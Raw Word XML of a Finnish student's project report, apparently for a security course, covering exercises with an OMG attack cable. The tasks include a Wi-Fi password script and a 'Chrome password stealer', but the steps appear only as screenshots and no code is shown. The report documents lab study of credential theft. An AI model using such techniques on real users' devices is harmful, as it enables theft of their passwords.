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A1631" w14:textId="1F90BA3D" w:rsidR="00D9303B" w:rsidRDefault="00366DF5" w:rsidP="00D9303B">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00366DF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132E07FC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>3925</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-803910</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7551049" cy="10692000"/>
                <wp:effectExtent l="0" t="0" r="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366DF5" w:rsidRDefault="00366DF5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9D54" id="Rectangle 5" o:spid="_x0000_s1026" alt="&quot;&quot;" style="position:absolute;margin-left:.3pt;margin-top:-63.3pt;width:594.55pt;height:841.9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" stroked="f" strokeweight="2pt">
                <v:fill r:id="rId12" o:title="" recolor="t" rotate="t" type="frame"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="293F957E" w14:textId="77777777" w:rsidR="00366DF5" w:rsidRDefault="00366DF5" w:rsidP="00366DF5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1D254803">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>392430</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>708025</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5581015" cy="5410200"/>
                <wp:effectExtent l="0" t="0" r="635" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="11" name="Suorakulmio 11" descr="Tämä on tekstikehikko, jonka sisälle kirjoitetaan tämän dokumentin kirjoittajan tunnistetiedo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dec="http://schemas.microsoft.com/office/drawing/2017/decorative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dec="http://schemas.microsoft.com/office/drawing/2017/decorative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66196" w14:textId="3F634F81" w:rsidR="00D9303B" w:rsidRDefault="006F41AD" w:rsidP="00D930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uri Partinen ktkt23sp</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1A592633" w14:textId="6C837136" w:rsidR="006F41AD" w:rsidRDefault="006F41AD" w:rsidP="00D9303B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Aloitusprojekti raportti</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="595B0982" w14:textId="77777777" w:rsidR="00D9303B" w:rsidRDefault="00D9303B" w:rsidP="00D9303B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488B125" w14:textId="77304507" w:rsidR="00D9303B" w:rsidRDefault="006F41AD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mmon osio</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="433A778C" w14:textId="31430980" w:rsidR="00D9303B" w:rsidRDefault="006F41AD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loitusprojekti</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="35090463" w14:textId="77777777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FA0B3A" w14:textId="4CD1B8C3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6F41AD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548D91ED" w14:textId="77777777" w:rsidR="00D9303B" w:rsidRDefault="00D9303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EA4D" id="Suorakulmio 11" o:spid="_x0000_s1027" alt="Tämä on tekstikehikko, jonka sisälle kirjoitetaan tämän dokumentin kirjoittajan tunnistetiedot." style="position:absolute;margin-left:30.9pt;margin-top:55.75pt;width:439.4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" filled="f" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="33666196" w14:textId="3F634F81" w:rsidR="00D9303B" w:rsidRDefault="006F41AD" w:rsidP="00D930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uri Partinen ktkt23sp</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1A592633" w14:textId="6C837136" w:rsidR="006F41AD" w:rsidRDefault="006F41AD" w:rsidP="00D9303B">
                      <w:pPr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Aloitusprojekti raportti</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="595B0982" w14:textId="77777777" w:rsidR="00D9303B" w:rsidRDefault="00D9303B" w:rsidP="00D9303B">
                      <w:pPr>
                        <w:spacing w:line="240" w:lineRule="auto"/>
                        <w:jc w:val="center"/>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="1488B125" w14:textId="77304507" w:rsidR="00D9303B" w:rsidRDefault="006F41AD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mmon osio</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="433A778C" w14:textId="31430980" w:rsidR="00D9303B" w:rsidRDefault="006F41AD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loitusprojekti</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="35090463" w14:textId="77777777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5FA0B3A" w14:textId="4CD1B8C3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="006F41AD">
                        <w:rPr>
                          <w:sz w:val="32"/>
                          <w:szCs w:val="32"/>
                        </w:rPr>
                        <w:t>24</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="548D91ED" w14:textId="77777777" w:rsidR="00D9303B" w:rsidRDefault="00D9303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20AA1" w14:textId="77777777" w:rsidR="00D9303B" w:rsidRDefault="00D9303B" w:rsidP="00D9303B">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="248E7824" w14:textId="346847A1" w:rsidR="00D9303B" w:rsidRPr="002E1C42" w:rsidRDefault="00D9303B" w:rsidP="00D9303B">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08A3B2A8" w14:textId="77777777" w:rsidR="00D9303B" w:rsidRDefault="00D9303B" w:rsidP="00D9303B">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B0985A4" w14:textId="77777777" w:rsidR="00D9303B" w:rsidRDefault="00D9303B" w:rsidP="00D9303B">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0758974F" w14:textId="77777777" w:rsidR="00D9303B" w:rsidRDefault="00D9303B" w:rsidP="00D9303B">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CB1640C" w14:textId="77777777" w:rsidR="00D9303B" w:rsidRDefault="00D9303B" w:rsidP="00D9303B">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C5822F5" w14:textId="77777777" w:rsidR="00D9303B" w:rsidRDefault="00D9303B" w:rsidP="00D9303B">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C4201ED" w14:textId="77777777" w:rsidR="00D9303B" w:rsidRDefault="00D9303B" w:rsidP="00D9303B">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B508A62" w14:textId="77777777" w:rsidR="00D9303B" w:rsidRDefault="00D9303B" w:rsidP="00D9303B">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BD9AEAA" w14:textId="77777777" w:rsidR="00D9303B" w:rsidRDefault="00D9303B" w:rsidP="00D9303B">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="290E7A2A" w14:textId="77777777" w:rsidR="00D9303B" w:rsidRDefault="00D9303B" w:rsidP="00D9303B">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B715EE6" w14:textId="77777777" w:rsidR="00D9303B" w:rsidRDefault="00D9303B" w:rsidP="00D9303B">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37525587" w14:textId="77777777" w:rsidR="00D9303B" w:rsidRDefault="00D9303B" w:rsidP="00D9303B">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CA7E9D1" w14:textId="77777777" w:rsidR="00D9303B" w:rsidRDefault="00D9303B" w:rsidP="00D9303B">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00C1E599" w14:textId="77777777" w:rsidR="00D9303B" w:rsidRDefault="00D9303B" w:rsidP="00D9303B">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2991DD00" w14:textId="77777777" w:rsidR="00D9303B" w:rsidRPr="002E1C42" w:rsidRDefault="00D9303B" w:rsidP="00D9303B">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BD8083D" w14:textId="77777777" w:rsidR="00D9303B" w:rsidRPr="002E1C42" w:rsidRDefault="00D9303B" w:rsidP="00D9303B">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09C0FD31" w14:textId="77777777" w:rsidR="00D9303B" w:rsidRDefault="00D9303B" w:rsidP="00D9303B"/>
    <w:p w14:paraId="4BBE07AF" w14:textId="77777777" w:rsidR="00F74DFA" w:rsidRDefault="00F74DFA" w:rsidP="00D9303B"/>
    <w:p w14:paraId="543997F8" w14:textId="77777777" w:rsidR="00F74DFA" w:rsidRDefault="00F74DFA" w:rsidP="00D9303B"/>
    <w:p w14:paraId="4087E54D" w14:textId="77777777" w:rsidR="00F74DFA" w:rsidRDefault="00F74DFA" w:rsidP="00D9303B"/>
    <w:p w14:paraId="38749D81" w14:textId="77777777" w:rsidR="00F74DFA" w:rsidRDefault="00F74DFA" w:rsidP="00D9303B"/>
    <w:p w14:paraId="6CCB323B" w14:textId="77777777" w:rsidR="00F74DFA" w:rsidRDefault="00F74DFA" w:rsidP="00D9303B"/>
    <w:p w14:paraId="4A52EF81" w14:textId="77777777" w:rsidR="00F74DFA" w:rsidRDefault="00F74DFA" w:rsidP="00D9303B">
      <w:r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1085D3A7" wp14:editId="4AB5DEF8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:posOffset>6316980</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3029585" cy="1905000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="3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AFB42" w14:textId="77777777" w:rsidR="00F74DFA" w:rsidRDefault="00F74DFA" w:rsidP="00D9303B"/>
    <w:p w14:paraId="2245F330" w14:textId="77777777" w:rsidR="00F74DFA" w:rsidRDefault="00F74DFA" w:rsidP="00D9303B"/>
    <w:p w14:paraId="708F349A" w14:textId="77777777" w:rsidR="00F74DFA" w:rsidRDefault="00F74DFA" w:rsidP="00D9303B"/>
    <w:p w14:paraId="40E1F2AE" w14:textId="77777777" w:rsidR="00F74DFA" w:rsidRDefault="00F74DFA" w:rsidP="00D9303B"/>
    <w:p w14:paraId="3727C511" w14:textId="77777777" w:rsidR="00D9303B" w:rsidRDefault="00D9303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BBFFE70" w14:textId="77777777" w:rsidR="001F0E52" w:rsidRDefault="004A51A7">
      <w:pPr>
        <w:pStyle w:val="Sisllysluettelonotsikko"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SISÄLLYS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F90B952" w14:textId="77777777" w:rsidR="00493B7C" w:rsidRDefault="00493B7C" w:rsidP="002C7D08">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6509660A" w14:textId="078A2E35" w:rsidR="00C10331" w:rsidRDefault="00902FEE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OC \o "1-3" \h \z \u </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="fi-FI"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc185288615" w:history="1">
        <w:r w:rsidR="00C10331" w:rsidRPr="00484153">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
        <w:r w:rsidR="00C10331"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="00C10331" w:rsidRPr="00484153">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>OMG kaapeli</w:t>
        </w:r>
        <w:r w:rsidR="00C10331">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00C10331">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00C10331">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc185288615 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00C10331">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00C10331">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000261B6">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r w:rsidR="00C10331">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="14BEFF2E" w14:textId="1343F360" w:rsidR="00C10331" w:rsidRDefault="00C10331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hyperlink w:anchor="_Toc185288620" w:history="1">
        <w:r w:rsidRPr="00484153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Pr="00484153">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Logshell hakker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1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03676" w14:textId="0F91A768" w:rsidR="00C10331" w:rsidRDefault="00C10331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hyperlink w:anchor="_Toc185288621" w:history="1">
        <w:r w:rsidRPr="00484153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Pr="00484153">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Virtuaalik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1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465A41" w14:textId="03A08538" w:rsidR="00C10331" w:rsidRDefault="00C10331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hyperlink w:anchor="_Toc185288622" w:history="1">
        <w:r w:rsidRPr="00484153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Pr="00484153">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hack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1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16687" w14:textId="299010EE" w:rsidR="00C10331" w:rsidRDefault="00C10331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hyperlink w:anchor="_Toc185288623" w:history="1">
        <w:r w:rsidRPr="00484153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Pr="00484153">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Azur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1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C706A3" w14:textId="183AD954" w:rsidR="00C10331" w:rsidRDefault="00C10331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hyperlink w:anchor="_Toc185288624" w:history="1">
        <w:r w:rsidRPr="00484153">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>6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Pr="00484153">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Rubber duc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1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565A87" w14:textId="130C4EAC" w:rsidR="00C10331" w:rsidRDefault="00C10331">
      <w:pPr>
        <w:pStyle w:val="Sisluet1"/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fi-FI"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc185288625" w:history="1">
        <w:r w:rsidRPr="00484153">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>7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Cs w:val="24"/>
            <w:lang w:eastAsia="fi-FI"/>
            <w14:ligatures w14:val="standardContextual"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00484153">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Reflek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1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C065FB" w14:textId="55DBD98A" w:rsidR="003B45E1" w:rsidRDefault="00902FEE" w:rsidP="006D68D8">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="fi-FI"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2015440C" w14:textId="77777777" w:rsidR="001F0E52" w:rsidRDefault="001F0E52">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="001F0E52" w:rsidSect="00541EC6">
          <w:headerReference w:type="default" r:id="rId14"/>
          <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
          <w:pgMar w:top="992" w:right="1134" w:bottom="709" w:left="1134" w:header="709" w:footer="709" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AE04F8E" w14:textId="17A980C8" w:rsidR="00607F60" w:rsidRDefault="004A066A" w:rsidP="00171C41">
      <w:pPr>
        <w:pStyle w:val="Otsikko1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc185288615"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>OMG kaapeli</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="4049D962" w14:textId="77777777" w:rsidR="00641D29" w:rsidRDefault="00641D29" w:rsidP="00641D29"/>
    <w:p w14:paraId="70460AFD" w14:textId="65A450E0" w:rsidR="00641D29" w:rsidRPr="00641D29" w:rsidRDefault="00641D29" w:rsidP="00641D29">
      <w:r>
        <w:t>Tehtävä 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE9C559" w14:textId="77777777" w:rsidR="00641D29" w:rsidRDefault="00641D29" w:rsidP="00641D29"/>
    <w:p w14:paraId="4E55AFFC" w14:textId="4B99277A" w:rsidR="00641D29" w:rsidRPr="00641D29" w:rsidRDefault="00641D29" w:rsidP="00641D29">
      <w:r w:rsidRPr="00641D29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D8C47B0" wp14:editId="669E6BCA">
            <wp:extent cx="5292090" cy="2257425"/>
            <wp:effectExtent l="0" t="0" r="3810" b="9525"/>
            <wp:docPr id="184437354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3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2548" w14:textId="1017E48C" w:rsidR="00544B15" w:rsidRDefault="00544B15" w:rsidP="00544B15">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C1D306E" w14:textId="4227FC37" w:rsidR="008F6D9E" w:rsidRDefault="00734A2D" w:rsidP="00563445">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00734A2D">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20B30774" wp14:editId="6B82C523">
            <wp:extent cx="5292090" cy="2708910"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="137678725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872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3104" w14:textId="77777777" w:rsidR="00641D29" w:rsidRDefault="00641D29" w:rsidP="00563445">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C998D0D" w14:textId="61460255" w:rsidR="00641D29" w:rsidRDefault="00641D29" w:rsidP="00563445">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tehtävä 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFE5674" w14:textId="77777777" w:rsidR="00641D29" w:rsidRDefault="00641D29" w:rsidP="00563445">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5891DC27" w14:textId="23343D62" w:rsidR="00641D29" w:rsidRDefault="00804BE5" w:rsidP="00563445">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00804BE5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2623AACD" wp14:editId="04827B2A">
            <wp:extent cx="5292090" cy="1970405"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="125819476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947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C984" w14:textId="7804D3E2" w:rsidR="00804BE5" w:rsidRDefault="00CE3204" w:rsidP="00563445">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE3204">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C41757E" wp14:editId="73F0D13B">
            <wp:extent cx="5292090" cy="3085465"/>
            <wp:effectExtent l="0" t="0" r="3810" b="635"/>
            <wp:docPr id="8765225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2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6066" w14:textId="77777777" w:rsidR="009C40E2" w:rsidRDefault="009C40E2" w:rsidP="00563445">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B8FB679" w14:textId="1BF37810" w:rsidR="009C40E2" w:rsidRDefault="004F1830" w:rsidP="00563445">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F1830">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tehtävä 4. Wifi passwords scripti. Tällä pitäisi saada wifi -salasanat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65241F9C" w14:textId="77777777" w:rsidR="004F1830" w:rsidRDefault="004F1830" w:rsidP="00563445">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11E1E5B0" w14:textId="2D5378E5" w:rsidR="004F1830" w:rsidRDefault="00F2009F" w:rsidP="00563445">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F2009F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7651ADBF" wp14:editId="3EE38A34">
            <wp:extent cx="5292090" cy="2879090"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="122651218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21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CA07" w14:textId="77777777" w:rsidR="004F1830" w:rsidRDefault="004F1830" w:rsidP="00563445">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42B13423" w14:textId="77777777" w:rsidR="004F1830" w:rsidRDefault="004F1830" w:rsidP="00563445">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="353A90BC" w14:textId="77777777" w:rsidR="005B342D" w:rsidRDefault="005B342D" w:rsidP="0078295A">
      <w:pPr>
        <w:pStyle w:val="Lhteet-otsikko"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5566CE42" w14:textId="77777777" w:rsidR="00765D7E" w:rsidRDefault="00765D7E" w:rsidP="0078295A">
      <w:pPr>
        <w:pStyle w:val="Lhteet-otsikko"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E1B12D8" w14:textId="77777777" w:rsidR="00765D7E" w:rsidRPr="006D68D8" w:rsidRDefault="00765D7E" w:rsidP="00765D7E">
      <w:pPr>
        <w:pStyle w:val="Lhteet-otsikko"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc184118567"/>
      <w:bookmarkStart w:id="2" w:name="_Toc184118708"/>
      <w:bookmarkStart w:id="3" w:name="_Toc185288616"/>
      <w:r w:rsidRPr="006D68D8">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Tehtävä 5. Chrome password stealer. Tällä pitäisi saada chrome salasanat. Step by step guiden alla on valmiiksi tehdyt käyttäjät, joita voit hyödyntää tässä tehtävässä.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidRPr="006D68D8">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EB835A" w14:textId="77777777" w:rsidR="00765D7E" w:rsidRDefault="00765D7E" w:rsidP="0078295A">
      <w:pPr>
        <w:pStyle w:val="Lhteet-otsikko"/>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CEBB742" w14:textId="77777777" w:rsidR="005B342D" w:rsidRDefault="005B342D" w:rsidP="0078295A">
      <w:pPr>
        <w:pStyle w:val="Lhteet-otsikko"/>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56E9B8C0" w14:textId="77777777" w:rsidR="005B342D" w:rsidRDefault="005B342D" w:rsidP="0078295A">
      <w:pPr>
        <w:pStyle w:val="Lhteet-otsikko"/>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CCD8425" w14:textId="0156CE84" w:rsidR="005B342D" w:rsidRDefault="005B342D" w:rsidP="0078295A">
      <w:pPr>
        <w:pStyle w:val="Lhteet-otsikko"/>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc184118642"/>
      <w:bookmarkStart w:id="5" w:name="_Toc184118709"/>
      <w:bookmarkStart w:id="6" w:name="_Toc185288617"/>
      <w:r w:rsidRPr="005B342D">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52F14671" wp14:editId="370F9E43">
            <wp:extent cx="5292090" cy="2802255"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="114348481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84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B4C">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="1B6A11A8" w14:textId="77777777" w:rsidR="00095B4C" w:rsidRPr="006D68D8" w:rsidRDefault="00095B4C" w:rsidP="0078295A">
      <w:pPr>
